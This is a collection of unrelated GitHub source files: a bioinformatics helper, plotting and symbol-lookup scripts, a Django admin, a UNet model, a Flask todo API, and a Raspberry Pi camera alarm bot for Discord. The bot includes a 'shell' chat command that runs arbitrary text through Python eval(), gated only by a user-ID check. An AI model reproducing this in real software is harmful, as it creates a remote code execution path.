gene_object.fragments:\n min_left_pos = min(gene_object.fragments, key=lambda x: x.left_end_position)\n max_right_pos = max(gene_object.fragments, key=lambda x: x.right_end_position)\n gene_object.left_end_position = min_left_pos.left_end_position\n gene_object.right_end_position = max_right_pos.right_end_position\n dict_genes.append({\n \"id\": gene_object.id,\n \"name\": gene_object.name,\n \"left_end_position\": gene_object.left_end_position,\n \"right_end_position\": gene_object.right_end_position\n })\n if len(dict_genes) > 0:\n if strand == \"forward\":\n first_gene = (min(dict_genes, key=lambda x: x[\"left_end_position\"]))\n elif strand == \"reverse\":\n first_gene = (max(dict_genes, key=lambda x: x[\"right_end_position\"]))\n return first_gene\n","repo_name":"regulondbunam/RegulonDB-Datamarts","sub_path":"src/datamarts/domain/regulon_datamart/regulatory_interactions.py","file_name":"regulatory_interactions.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328579368","text":"import matplotlib.pyplot as plt\n\n\ndef draw_loss_accuracy_plot(curves: dict) -> None:\n \"\"\" The function creates a plot of 4 curves and displays it\"\"\"\n colors = \"bgrcmyk\"\n color_index = 0\n epochs = range(1, len(next(iter(curves.values()))) + 1)\n\n for label, value in curves.items():\n plt.plot(epochs, value, c=colors[color_index], label=label)\n color_index += 1\n\n plt.xticks(epochs)\n plt.legend(bbox_to_anchor=(1.05, 1), loc='upper left', borderaxespad=0.)\n plt.show()\n","repo_name":"knodle/knodle","sub_path":"knodle/evaluation/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"2815048722","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\n\ndef print_usage():\n print(\"Usage: {0} SYMBOL LIBRARY [LIBRARY]...\".format(sys.argv[0]))\n\ndef print_symbols(searchSymbol, searchLibraries):\n cmd = [\"objdump\", \"-CT\"] + searchLibraries\n p = Popen(cmd, stdout=PIPE)\n stdout = p.communicate()[0].rstrip()\n\n # parse\n lastFile = \"\"\n for line in stdout.splitlines():\n if \"file format\" in line:\n fileName = line.split(\":\")[0]\n lastFile = fileName\n continue\n\n if \".text\" in line:\n # filter the symbol from the objdump line\n words = line.split(\" \")\n startIndexOfSymbol = len(words) - words[::-1].index(\"\")\n symbol = \" \".join(words[startIndexOfSymbol:])\n\n # we're only interested in the part before '('\n if searchSymbol in symbol.split(\"(\")[0]:\n print(\"{0}: {1}\".format(lastFile, symbol))\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 2:\n print_usage()\n sys.exit(1)\n\n searchSymbol = sys.argv[1]\n searchLibraries = sys.argv[2:]\n\n # call\n print_symbols(searchSymbol, searchLibraries)\n sys.exit(0)\n","repo_name":"krf/dotfiles","sub_path":"bin/find_symbol.py","file_name":"find_symbol.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19904110255","text":"\"\"\"\nhierahy admin\n\"\"\"\nimport os\nimport json\nfrom django.forms import BooleanField\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.admin.views.main import ChangeList, ERROR_FLAG\nfrom 
django.contrib.admin import helpers\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib import admin\nfrom django.utils.translation import ugettext as _\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.encoding import force_text\nfrom django.conf import settings\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom django import VERSION as DjangoVersion\nfrom django.template.response import SimpleTemplateResponse\n\nfrom elements.forms import dynamicforms\nfrom elements.settings import HIERARHY_STATIC_URL, CSS_PATH\n\n\nif DjangoVersion[:2] >= (1, 5):\n DJANGO_VERSION = 15\nelse:\n DJANGO_VERSION = \"%d%d\" % (DjangoVersion[:2][0], DjangoVersion[:2][1])\n\ncsrf_protect_m = method_decorator(csrf_protect)\n\n\nclass IncorrectLookupParameters(Exception):\n \"\"\"\n Exseption\n \"\"\"\n pass\n\n\nclass NavigationForm(dynamicforms.Form):\n \"\"\"\n nav form\n \"\"\"\n\n status = BooleanField(required=False)\n\n\nclass MyChangeList(ChangeList):\n \"\"\"\n change list\n \"\"\"\n def get_queryset(self, request, root=True):\n \"\"\"\n override get queryset\n \"\"\"\n if root:\n self.params['parent'] = None\n else:\n self.params = {}\n qus = super(MyChangeList, self).get_queryset(request)\n return qus\n\n\nclass HierarhyModelAdmin(admin.ModelAdmin):\n \"\"\"\n hierahy model admin\n \"\"\"\n\n class Media:\n \"\"\"\n model media\n \"\"\"\n\n if settings.DEBUG:\n CSS_PATH = '%s/src' % CSS_PATH\n\n css = {\n 'all': [os.path.join(HIERARHY_STATIC_URL, CSS_PATH, path)\n for path in (\n 'navigation.css',\n )]\n }\n\n def process_item(self, item, form):\n \"\"\"\n process item\n \"\"\"\n pass\n\n def save_changed(self, request, queryset):\n \"\"\"\n save changes\n \"\"\"\n def id(name):\n \"\"\"\n ID\n \"\"\"\n return int(name.split('-')[-1])\n\n def realign(items, data, parent=None, position=1):\n \"\"\"\n realign\n \"\"\"\n for dat in data:\n item = items[id(dat['id'])]\n item.invalidate()\n item.position = position\n item.parent = parent\n position += 1\n item.save()\n realign(items, dat['children'], item, position)\n\n try:\n path = request.META['HTTP_REFERER']\n except ValueError:\n path = '.'\n\n if request.method == 'POST':\n items = dict(\n [(item.id, item) for item in self.model.objects.all()])\n redata = request.POST.get('navigation')\n hierarchy_data = json.loads(redata)\n realign(items, hierarchy_data)\n for form in NavigationForm.get_forms(request):\n assert form.is_valid()\n try:\n item = items[int(form.id)]\n self.process_item(item, form)\n except KeyError:\n pass # Should we fail silently?\n\n [entry.save() for entry in items.values()]\n\n self.message_user(\n request, _('The navigation was updated successfully. 
'\n 'You may edit it again below.'))\n\n return HttpResponseRedirect(path)\n\n save_changed.short_description = \"%s\" % _(\"Save selected changes\")\n ordering = [\"position\"]\n item_template = 'admin/nav_item.html'\n\n @csrf_protect_m\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n changelist_view\n \"\"\"\n # super(HierarhyModelAdmin, self).changelist_view(request)\n media = self.media\n\n opts = self.model._meta\n app_label = opts.app_label\n if not self.has_change_permission(request, None):\n raise PermissionDenied\n\n # Check actions to see if any are available on this changelist\n actions = self.get_actions(request)\n list_display = list(self.list_display)\n self.list_editable = list(self.list_editable)\n self.list_filter = list(self.list_filter)\n\n # Remove action checkboxes if there aren't any actions available.\n if not actions:\n try:\n list_display.remove('action_checkbox')\n except ValueError:\n pass\n\n try:\n list_display_links = self.get_list_display_links(request,\n list_display)\n except AttributeError:\n list_display_links = []\n\n if self.list_max_show_all:\n list_max_show_all = self.list_max_show_all\n else:\n list_max_show_all = []\n\n try:\n if int(DJANGO_VERSION) > 13:\n cli = MyChangeList(request, self.model, list_display,\n list_display_links, self.list_filter,\n self.date_hierarchy, self.search_fields,\n self.list_select_related,\n self.list_per_page, list_max_show_all,\n self.list_editable, self)\n else:\n cli = MyChangeList(request, self.model, list_display,\n self.list_display_links, self.list_filter,\n self.date_hierarchy, self.search_fields,\n self.list_select_related,\n self.list_per_page, self.list_editable,\n self)\n except IncorrectLookupParameters:\n # Wacky lookup parameters were given, so redirect to the main\n # changelist page, without parameters, and pass an 'invalid=1'\n # parameter via the query string. If wacky parameters were given\n # and the 'invalid=1' parameter was already in the query string,\n # something is screwed up with the database, so display an error\n # page.\n if ERROR_FLAG in request.GET.keys():\n return SimpleTemplateResponse('admin/invalid_setup.html', {\n 'title': _('Database error'),\n })\n return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')\n\n # If the request was POSTed, this might be a bulk action or a bulk\n # edit. Try to look up an action or confirmation first, but if this\n # isn't an action the POST will fall through to the bulk edit check,\n # below.\n\n selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)\n # Actions with no confirmation\n if (actions and request.method == 'POST' and\n 'index' in request.POST and '_save' not in request.POST):\n if selected:\n response = self.response_action(\n request,\n queryset=cli.get_queryset(request, False))\n if response:\n return response\n\n else:\n msg = _(\"Items must be selected in order to perform \"\n \"actions on them. No items have been changed.\")\n self.message_user(request, msg)\n\n # Actions with confirmation\n if (actions and request.method == 'POST' and\n helpers.ACTION_CHECKBOX_NAME in request.POST and\n 'index' not in request.POST and '_save' not in request.POST):\n if selected:\n response = \\\n self.response_action(request,\n queryset=cli.get_query_set(request,\n False))\n if response:\n return response\n\n # If we're allowing changelist editing, we need to construct a formset\n # for the changelist given all the fields to be edited. 
Then we'll\n # use the formset to validate/process POSTed data.\n formset = cli.formset = None\n\n # Build the list of media to be used by the formset.\n if formset:\n media = self.media + formset.media\n else:\n media = self.media\n\n # Build the action form and populate it with available actions.\n if actions:\n action_form = self.action_form(auto_id=None)\n action_form.fields['action'].choices = \\\n self.get_action_choices(request)\n else:\n action_form = None\n\n media.add_js((\n HIERARHY_STATIC_URL + \"js/mootools.js\",\n HIERARHY_STATIC_URL + \"js/nested.min.js\",\n HIERARHY_STATIC_URL + \"js/navigation.min.js\",\n ))\n\n context = {\n 'module_name': force_text(opts.verbose_name_plural),\n 'title': _('Edit') + ' ' + _(opts.verbose_name_plural),\n 'is_popup': cli.is_popup,\n 'error': None,\n 'cl': cli,\n 'item_template': self.item_template,\n 'media': mark_safe(media),\n 'opts': opts,\n 'has_add_permission': self.has_add_permission(request),\n 'app_label': app_label,\n 'action_form': action_form,\n 'actions_on_top': self.actions_on_top,\n 'actions_on_bottom': self.actions_on_bottom,\n 'actions_selection_counter': self.actions_selection_counter,\n 'django_version': DJANGO_VERSION,\n }\n context.update(extra_context or {})\n context_instance = \\\n template.RequestContext(request, current_app=self.admin_site.name)\n return render_to_response('admin/navigation_list.html',\n context, context_instance)\n\n def __call__(self, request, url):\n \"\"\"\n call\n \"\"\"\n if url is None:\n return self.changelist_view(request)\n return super(HierarhyModelAdmin, self).__call__(request, url)\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n save model\n \"\"\"\n target = request.GET.get('target', None)\n position = request.GET.get('position', None)\n\n if target is not None and position is not None:\n try:\n target = self.model.objects.get(pk=target)\n except self.model.DoesNotExist:\n pass\n else:\n target.invalidate()\n obj.move_to(target, position)\n\n super(HierarhyModelAdmin, self).save_model(request, obj, form, change)\n","repo_name":"yoza/base-elements","sub_path":"elements/admin/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":10921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42344289372","text":"import re\n\n\"\"\"\nmust start with character\n\n\"\"\"\npattern_str = r'^[a-z]\\w*@[a-z]\\w*\\.[a-z]{3}'\npattern = re.compile(pattern_str)\nstr = 'hello@example.com'\nstr1 = 'hello@3example.com'\nprint(re.match(pattern=pattern,string=str1))","repo_name":"mbaddar1/coding_exercises","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725796009","text":"import torch\nimport torch.nn as nn\nfrom .unet_parts import *\nfrom unet.layers import *\nfrom unet.util import count_param\n\nclass UNetNested(nn.Module):\n def __init__(self, in_channels=3, n_classes=2, feature_scale=2, is_deconv=True, is_ds=True, sync_bn=False):\n super(UNetNested, self).__init__()\n self.in_channels = in_channels\n self.feature_scale = feature_scale\n self.is_deconv = is_deconv \n self.is_ds = is_ds\n self.batchnorm = nn.BatchNorm2d\n\n filters = [128, 256, 512, 1024]\n filters = [int(i / self.feature_scale) for i in filters]\n\n #downsampling\n self.maxpool = nn.MaxPool2d(kernel_size=2)\n self.conv00 = UnetConv2(self.in_channels, 32, self.batchnorm)\n self.conv10 = 
UnetConv2(32, 64, self.batchnorm)\n self.conv20 = UnetConv2(64, 128, self.batchnorm)\n self.conv30 = UnetConv2(128, 256, self.batchnorm)\n self.conv40 = UnetConv2(256, 512, self.batchnorm)\n\n # upsampling\n self.up_concat01 = UnetUp(64, 32, self.is_deconv)\n self.up_concat11 = UnetUp(128, 64, self.is_deconv)\n self.up_concat21 = UnetUp(256, 128, self.is_deconv)\n self.up_concat31 = UnetUp(512, 256, self.is_deconv)\n\n self.up_concat02 = UnetUp(64, 32, self.is_deconv, 3)\n self.up_concat12 = UnetUp(128, 64, self.is_deconv, 3)\n self.up_concat22 = UnetUp(256, 128, self.is_deconv, 3)\n\n self.up_concat03 = UnetUp(64, 32, self.is_deconv, 4)\n self.up_concat13 = UnetUp(128, 64, self.is_deconv, 4)\n\n self.up_concat04 = UnetUp(64, 32 , self.is_deconv, 5)\n\n self.final_1 = nn.Conv2d(32, 2, 1)\n self.final_2 = nn.Conv2d(32, 2, 1)\n self.final_3 = nn.Conv2d(32, 2, 1)\n self.final_4 = nn.Conv2d(32, 2, 1)\n\n self.__init_weight()\n\n def forward(self, inputs):\n \n x_00 = self.conv00(inputs)\n maxpool0 = self.maxpool(x_00)\n x_10 = self.conv10(maxpool0)\n maxpool1 = self.maxpool(x_10)\n x_20 = self.conv20(maxpool1)\n maxpool2 = self.maxpool(x_20)\n x_30 = self.conv30(maxpool2)\n maxpool3 = self.maxpool(x_30)\n x_40 = self.conv40(maxpool3)\n\n # column:1\n x_01 = self.up_concat01(x_10, x_00)\n x_11 = self.up_concat11(x_20, x_10)\n x_21 = self.up_concat21(x_30, x_20)\n x_31 = self.up_concat31(x_40, x_30)\n\n #column:2\n x_02 = self.up_concat02(x_11, x_00, x_01)\n x_12 = self.up_concat12(x_21, x_10, x_11)\n x_22 = self.up_concat22(x_31, x_20, x_21)\n\n # column:3\n x_03 = self.up_concat03(x_12, x_00, x_01, x_02)\n x_13 = self.up_concat13(x_22, x_10, x_11, x_12)\n\n # column:4\n x_04 = self.up_concat04(x_13, x_00, x_01, x_02, x_03)\n\n\n final_1 = self.final_1(x_01)\n final_2 = self.final_2(x_02)\n final_3 = self.final_3(x_03)\n final_4 = self.final_4(x_04)\n\n final = (final_1+final_2+final_3+final_4) / 4 \n\n if self.is_ds:\n return final\n else:\n return final_4\n\n\n def __init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.UpsamplingBilinear2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n\nif __name__ == \"__main__\":\n model = UNetNested()\n param = count_param(model)\n # print(model)\n print('UNetNested total parameters: %.2fM (%d)' % (param /1e6, param))","repo_name":"junwenxiong/HuaweiCloudCup","sub_path":"unet/unetNested.py","file_name":"unetNested.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36750547295","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom dynamic_reconfigure.client import Client\n\ndef callback(config):\n rospy.loginfo(\"Config set to {footprint}\".format(**config))\n\nif __name__ == \"__main__\":\n rospy.init_node(\"dynamic_client\")\n\n client = Client(\"/move_base_node/global_costmap\", timeout=5, config_callback=callback)\n print(client.get_parameter_descriptions())\n r = rospy.Rate(0.1)\n while not rospy.is_shutdown():\n client.update_configuration({\"footprint\":[[0.6,-0.3],[0.5,0.3],[-0.3,0.3],[-0.4,-0.2]]})\n 
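# update_configuration also accepts a partial dict of just the parameters\r\n        # that changed — e.g. (\"inflation_radius\" is an illustrative parameter name):\r\n        # client.update_configuration({\"inflation_radius\": 0.55})\r\n        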
r.sleep()","repo_name":"AmmarAlbakri/ammar_src","sub_path":"amr_services/scripts/dynamic_reconfigure_client.py","file_name":"dynamic_reconfigure_client.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9111502134","text":"#Jerry To\n#Capture the Honey Game\n#Written using Python 3.3.3 and Pygame \n#All art assets are free clip art from www.clker.com\n#Sound is from www.soundbible.com \n\nimport pygame, os, sys\nfrom pygame.locals import *\n#Class for each menu choice \nclass MenuItem():\n def __init__(self,text, font, x, y):\n self.text = text\n self.font = font\n self.textColor = (218, 165, 32)\n self.menuItem = self.font.render(self.text, 1, self.textColor)\n self.itemWidth = self.menuItem.get_rect().width\n self.itemHeight = self.menuItem.get_rect().height + 20\n self.x = x\n self.y = y\n self.pos = self.x, self.y\n \n #Sets position in menu for each option \n def setPos(self, x, y):\n self.x = x\n self.y = y\n self.pos = (x, y)\n #Set color of text \n def setColor(self, color):\n self.textColor = color\n self.menuItem = self.font.render(self.text, 1, self.textColor)\n #Checks if mouse hovers over \n def mouseSelected(self, mouse):\n if (mouse[0] >= self.x and mouse[0] <= (self.x + self.itemWidth)) and \\\n (mouse[1] >= self.y and mouse[1] <= (self.y + self.itemHeight)):\n return True\n \n return False\n #Checks if mouse clicked option \n def mouseClicked(self, mouse):\n if mouse.get_pressed()[0]:\n return True\n\n return False \n \n \n \n \n\n \n \n \n","repo_name":"jerryto48/CaptureTheHoney","sub_path":"MenuItem.py","file_name":"MenuItem.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16510798995","text":"from picamera import PiCamera\nfrom discord.ext import commands\nfrom discord.ext import tasks\nimport gpiozero\nimport shutil\nimport os\n\n# from picamera import PiCamera\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport discord, json, random, time, sys, threading, asyncio\n\nwith open(\"setting/setting.json\") as file:\n setting = json.load(file)\n\nwith open(\"locales/{}.json\".format(setting[\"global\"][\"language\"])) as file:\n text = json.load(file)\n\ntry:\n os.mkdir(\"capture\")\n sys.stdout.write(text[\"debug\"][\"makeCapture\"])\nexcept:\n pass\n\nbot = commands.Bot(\n description=setting[\"global\"][\"description\"],\n command_prefix=setting[\"global\"][\"prefix\"],\n)\n\ncamera = PiCamera()\nfirstConnection = True\nlocked = False\n\n\n@bot.command()\nasync def lock(ctx, *arg):\n global locked\n locked = True\n await ctx.send(embed=makeEmbed(text[\"embed\"][\"lock\"]))\n\n\n@bot.command()\nasync def unlock(ctx, *arg):\n global locked\n locked = False\n await ctx.send(embed=makeEmbed(text[\"embed\"][\"unlock\"]))\n\n\ndef makeEmbed(file):\n embed = discord.Embed(\n title=file[\"title\"],\n description=file[\"description\"],\n color=discord.Color.from_rgb(\n file[\"color\"][0],\n file[\"color\"][1],\n file[\"color\"][2],\n ),\n )\n for field in file[\"fields\"]:\n embed.add_field(\n name=field[\"name\"], value=field[\"value\"], inline=field[\"inline\"]\n )\n return embed\n\n\n# make a capture with picamera\ndef take_picture():\n name = time.strftime(\"capture/img %Hh %Mmin %Ssec.jpg\")\n camera.capture(name)\n sys.stdout.write(text[\"debug\"][\"saveImg\"].format(name))\n return name\n\n\ndef take_video(recordTime):\n \"\"\"record a video (only in 
h264 format because encoding is very slow on a Raspberry Pi)\"\"\"\n    name = time.strftime(\"capture/vid %Hh %Mmin %Ssec.h264\")\n    camera.start_recording(name)\n    camera.wait_recording(recordTime)\n    camera.stop_recording()\n    sys.stdout.write(text[\"debug\"][\"saveVid\"].format(name))\n    return name\n\n\n@bot.event\nasync def on_ready():\n    global firstConnection, channel\n    if firstConnection:\n        sys.stdout.write(\"ok \\n\")\n        channel = bot.get_channel(setting[\"global\"][\"channel\"])\n\n        sys.stdout.write(\n            \"logged in as {} \\nat {}\\n\".format(\n                bot.user, time.strftime(\"%Hh %Mmin %Ssec\")\n            )\n        )\n        gpioInit()\n        firstConnection = False\n        await channel.send(embed=makeEmbed(text[\"embed\"][\"start\"]))\n        await dailyCheck()\n        sys.stdout.write(\" - - - event - - - \\n\")\n\n    else:\n        sys.stdout.write(\n            \"> reconnected at {}\\n\".format(time.strftime(\"%Hh %Mmin %Ssec\"))\n        )\n        await channel.send(embed=makeEmbed(text[\"embed\"][\"reconnect\"]))\n\n\nasync def alert_pic(name):\n    \"\"\"take and post a picture when a sensor is triggered\"\"\"\n    global channel\n    sys.stdout.write(text[\"debug\"][\"sensorActivated\"].format(name))\n    await channel.send(\n        content=text[\"text\"][\"sensorActivated\"].format(\n            name, time.strftime(\"%Hh %Mmin %Ssec\")\n        ),\n        file=discord.File(take_picture()),\n    )\n\n\n@bot.command()\nasync def pic(ctx, *arg):\n    \"\"\"manually take a picture\"\"\"\n    await ctx.send(\n        content=text[\"text\"][\"imgTaken\"].format(time.strftime(\"%Hh %Mmin %Ssec\")),\n        file=discord.File(take_picture()),\n    )\n\n\n@bot.command()\nasync def vid(ctx, *arg):\n    \"\"\"manually take a video (only in h264 because encoding on a Raspberry Pi is slow); argument: time in seconds\"\"\"\n    message = await ctx.send(content=text[\"text\"][\"record\"])\n    try:\n        await ctx.send(file=discord.File(take_video(int(arg[0]))))\n        await message.edit(\n            content=text[\"text\"][\"vidTaken\"].format(time.strftime(\"%Hh %Mmin %Ssec\")),\n        )\n    except:\n        await message.edit(content=\"\", embed=makeEmbed(text[\"embed\"][\"videoError\"]))\n\n\n@bot.command()\nasync def shell(ctx, *arg):\n    \"\"\"shell command for debugging\"\"\"\n    embed = discord.Embed(\n        title=\"Shell command\",\n        color=discord.Color.red(),\n        description=\" \".join(arg),\n    )\n\n    embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)\n    if ctx.author.id == shellAccess:\n        try:\n            embed.add_field(name=\"Result :\", value=str(eval(\" \".join(arg))))\n            embed.color = discord.Color.blue()\n        except:\n            embed.add_field(name=\"Error :\", value=str(sys.exc_info()))\n        sys.stdout.write(\n            '> executed \" {} \" command in {}'.format(\" \".join(arg), ctx.channel)\n        )\n    else:\n        embed.add_field(name=\"denied access\", value=\"you can't use this command\")\n    await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def state(ctx, *arg):\n    \"\"\"show state of all sensors\"\"\"\n    embed = makeEmbed(text[\"embed\"][\"state\"])\n    states = \"\"\n    for elem in ils:\n        states += \"{} | {} {} \\n\".format(\n            elem[2],\n            \"🟩\" if elem[0].is_pressed == elem[1] else \"🟥\",\n            text[\"text\"][\"close\"] if elem[0].is_pressed else text[\"text\"][\"open\"],\n        )\n    embed.description = f\"```{states}```\"\n    await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def disk(ctx, *arg):\n    await checkDisk(ctx.channel)\n\n\nasync def checkDisk(channel, onlyIfLow=False):\n    \"\"\"check disk space\"\"\"\n    disk = shutil.disk_usage(\"/\")\n    if onlyIfLow:\n        if disk.free / disk.total > 0.1:\n            return\n        else:\n            sys.stdout.write(\"> disk space is low\\n\")\n            embed = makeEmbed(text[\"embed\"][\"diskLow\"])\n    else:\n        embed = 
makeEmbed(text[\"embed\"][\"disk\"])\n\n embed.description = text[\"text\"][\"disk\"].format(\n disk.total / (1024 * 1024 * 1024),\n disk.used / (1024 * 1024 * 1024),\n disk.free / (1024 * 1024 * 1024),\n disk.free / disk.total * 100,\n )\n await channel.send(embed=embed)\n\n\n@bot.command()\n@commands.has_permissions(administrator=True)\nasync def delete(ctx, day=999999999, *arg):\n \"\"\"delete all capture older than day argument: day in number\"\"\"\n await deleteOldCapture(ctx.channel, float(day))\n\n\nasync def deleteOldCapture(channel, day, automatic=False):\n \"\"\"delete old image\"\"\"\n deletes = []\n for file in os.listdir(\"capture\"):\n if file.endswith(\".jpg\") or file.endswith(\".h264\"):\n file_path = os.path.join(\"capture/\", file)\n if os.path.isfile(file_path):\n if time.time() - os.path.getmtime(file_path) > day * 24 * 60 * 60:\n os.remove(file_path)\n sys.stdout.write(f\"> {file_path} deleted\\n\")\n deletes.append(file)\n\n if len(deletes) == 0:\n if automatic:\n return\n else:\n await channel.send(embed=makeEmbed(text[\"embed\"][\"deleteEmpty\"]))\n else:\n embed = makeEmbed(text[\"embed\"][\"delete\"])\n embed.description = text[\"text\"][\"delete\"].format(\"\\n\".join(deletes))\n await channel.send(embed=embed)\n\n\n# gpio setup\n@tasks.loop(seconds=0.5)\nasync def eventLoop():\n if locked:\n for elem in ils:\n if elem[0].is_pressed != elem[1]:\n await alert_pic(elem[2])\n\n\ndef gpioInit():\n global ils\n ils = []\n for elem in setting[\"alarm\"][\"ils\"]:\n ils.append([gpiozero.Button(elem[\"port\"]), elem[\"close\"], elem[\"name\"]])\n\n eventLoop.start()\n\n\nwith open(\"setting/token.json\") as file:\n tokenFile = json.load(file)\n\n# daily check\n@tasks.loop(hours=24)\nasync def dailyCheck():\n await checkDisk(channel, True)\n if setting[\"global\"][\"captureTimeout\"] != -1:\n await deleteOldCapture(channel, setting[\"global\"][\"captureTimeout\"], True)\n\n\nsys.stdout.write(\"loggin to discord...\")\nshellAccess = tokenFile[\"shellAccess\"]\nbot.run(tokenFile[\"botToken\"])\n","repo_name":"orkeilius/alarm_discord_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37090972172","text":"import turtle\n\n\ntrtle = turtle.Turtle()\n\ncolor = input(\"Give me any color: \")\nprint(color)\nnumber = int(input(\"Give me the length: \"))\nprint(number)\n\ntrtle.color(color)\ntrtle.right(90)\ntrtle.forward(number)\n\n\nscreen = turtle.Screen()\nscreen.mainloop()","repo_name":"CowSai4/Python_CSP_Files","sub_path":"turtle/1.1/input_testing.py","file_name":"input_testing.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21301753509","text":"from flask import Flask, request, jsonify, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Set up the SQLite database\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Initialize the database and marshmallow\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n# Define the Task class\nclass Task(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n completed = 
db.Column(db.Boolean, default=False, nullable=False)\n\n def __init__(self, title, completed=False):\n self.title = title\n self.completed = completed\n\n# Define the Task schema\nclass TaskSchema(ma.Schema):\n class Meta:\n fields = ('id', 'title', 'completed')\n\n# Initialize the schema\ntask_schema = TaskSchema()\ntasks_schema = TaskSchema(many=True)\n\n# Create a new task\n@app.route('/task', methods=['POST'])\ndef add_task():\n if not request.json or 'title' not in request.json:\n return jsonify({'error': 'The title field is required.'}), 400\n title = request.json['title']\n completed = request.json.get('completed', False)\n new_task = Task(title, completed)\n db.session.add(new_task)\n db.session.commit()\n return task_schema.jsonify(new_task)\n\n# Get all tasks\n@app.route('/tasks', methods=['GET'])\ndef get_tasks():\n all_tasks = Task.query.all()\n result = tasks_schema.dump(all_tasks)\n return jsonify(result)\n\n# Get a single task\n@app.route('/task/', methods=['GET'])\ndef get_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n return task_schema.jsonify(task)\n\n# Update a task\n@app.route('/task/', methods=['PUT'])\ndef update_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n title = request.json.get('title', task.title)\n completed = request.json.get('completed', task.completed)\n task.title = title\n task.completed = completed\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Delete a task\n@app.route('/task/', methods=['DELETE'])\ndef delete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n db.session.delete(task)\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Mark a task as completed\n@app.route('/task/complete/', methods=['PUT'])\ndef complete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n task.completed = True\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Mark a task as incomplete\n@app.route('/task/incomplete/', methods=['PUT'])\ndef incomplete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n task.completed = False\n db.session.commit()\n return task_schema.jsonify(task)\n\n@app.before_request\ndef before_request():\n g.db = db\n# Run the application\nif __name__ == '__main__':\n with app.app_context():\n db.create_all()\n app.run(debug=True)\n\n \n","repo_name":"mayank-root/TODO-LIST","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19765247133","text":"#ETGG 1801\r\n#Eli Vaudrin\r\n#Lab05-Game Loops\r\n#Date:10/3/20\r\n\r\nimport pygame as pyg\r\nimport pygame.gfxdraw\r\nimport sys, math\r\n\r\npyg.init()\r\npyg.event.set_allowed([pyg.QUIT, pyg.MOUSEMOTION, pyg.MOUSEBUTTONDOWN, pyg.KEYDOWN])\r\n\r\n\r\nwindowClock = pygame.time.Clock()\r\nfps = 120\r\n\r\nres = (500, 500)\r\nrealres = (res[0]*1.2, res[1]*1.2)\r\n\r\nupdated = False\r\ndrects = []\r\n\r\n\r\nclear = (0, 0, 0, 0)\r\nw = (255, 255, 255)\r\ngray = (220, 220, 220)\r\nblck = (0, 0, 0)\r\nrd = (255, 0, 0)\r\ng = (0, 232, 0)\r\nb = (0, 45, 242)\r\ny = 